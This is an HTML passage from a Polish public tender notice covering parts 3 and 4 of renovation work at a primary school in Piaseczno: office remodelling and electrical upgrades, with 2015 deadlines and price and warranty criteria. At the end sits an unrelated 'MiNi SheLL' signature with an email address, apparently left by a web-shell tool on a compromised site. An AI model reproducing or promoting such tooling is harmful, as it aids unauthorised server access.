<li>2. Termin gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prace modernizacyjne w pomieszczeniach administracyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części III są prace modernizacyjne w pomieszczeniach administracyjnych w budynku Szkoły Podstawowej nr 5 połozonej przy ul. Szkolnej 14 w Piasecznie. Zakres rzeczowy prac obejmuje: 1. Demontaż paneli ze ścian i podłóg. 2. demontaż pełny ściany pomiędzy pomieszczeniami administracji a sekretariatem. 3. Postawienie scianki działowej z płyt GK. 4. Przygotowanie podłoża do malowania. 5. Położenie gładzi gipsowych na ścianach i sufitach. 6. Malowanie ścian i sufitów. 7. Zakup i wstawienie futryny, skrzydło drzwiowe do wykorzystania. 8. Ułożenie terakoty w caro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Modernizacja instalacji oświetleniowej i elektrycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części IV jest modernizacja instalacji oświetleniowej i elektrycznej w budynku Szkoły Podstawowej nr 5 w Piasecznie. Zakres rzeczowy robót do realizacji został określony w opisie przedmiotu zamówienia - załącznik A do części IV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin gwarancji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com